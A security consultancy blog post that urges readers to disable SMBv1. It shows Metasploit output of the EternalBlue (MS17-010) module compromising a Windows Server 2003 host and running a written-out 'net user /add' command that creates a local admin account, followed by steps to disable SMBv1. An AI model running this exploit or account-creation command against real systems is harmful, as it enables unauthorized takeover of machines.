TL;DR - set-smbserverconfiguration -EnableSMB1Protocol $false
Everyone has heard about the Eternalblue exploit that was been running wild in late 2017.
This exploit was used to spread ransomware around the world and it caused huge frustration, costs and overall panic in the workplace. Even popular TV shows like The Good Wife got scammed with ransomware. All this because a little SMB v1 exploit was being leveraged to gain entry and encrypt files.
Not safe yet
So, it’s June 2018 , and you would assume that people have patched and updated their computers and so we are safe now.
Unfortunately, it’s a daily occurrence here at GTconsult that our A-Team Protection team have found that the easiest and most abundant exploit is still the Eternalblue SMB v1 hack.
A lot of our clients still have old 2003 legacy machines that cannot be retired due to some line of business system that cannot be upgraded or moved. In this case, we have a Windows Server 2003 3790 Service Pack 2 vulnerable machine.
10.89.32.4:445 – Host is likely VULNERABLE to MS17-010! – Windows Server 2003 3790 Service Pack 2
msf auxiliary(admin/smb/ms17_010_command) > run
10.89.32.4:445 – Target OS: Windows Server 2003 3790 Service Pack 2
10.89.32.4:445 – Filling barrel with fish… done
10.89.32.4:445 – <—————- | Entering Danger Zone | —————->
10.89.32.4:445 – Preparing dynamite…
10.89.32.4:445 – Trying stick 1 (x64)…Miss
10.89.32.4:445 – Trying stick 2 (x86)…Boom!
10.89.32.4:445 – Successfully Leaked Transaction!
10.89.32.4:445 – Successfully caught Fish-in-a-barrel
10.89.32.4:445 – <—————- | Leaving Danger Zone | —————->
10.89.32.4:445 – Reading from CONNECTION struct at: 0x89a2bad8
10.89.32.4:445 – Built a write-what-where primitive…
10.89.32.4:445 – Overwrite complete… SYSTEM session obtained!
10.89.32.4:445 – Service start timed out, OK if running a command or non-service executable…
10.89.32.4:445 – checking if the file is unlocked
10.89.32.4:445 – Getting the command output…
10.89.32.4:445 – Executing cleanup…
10.89.32.4:445 – Cleanup was successful
10.89.32.4:445 – Command completed successfuly!
10.89.32.4:445 – Output for “net user /add gtconsult SDFGE%YSDFsaf12”:
And there you have it, we have made a local admin called GTconsult on the server and now own the box. All because SMB v1 was not disabled and will probably lead to us moving latterly to other machines and gain domain admin credentials.
So how do we stop this from happening
The best thing to do is disable SMB v1 and here are a few methods on how to do that:
Method 1 – PowerShell. set-smbserverconfiguration -EnableSMB1Protocol $false
Method 2 – Windows Configuration
Open Windows Features and uncheck SMB 1.0/CIFS File Sharing Support
This should make you safe again. Happy working!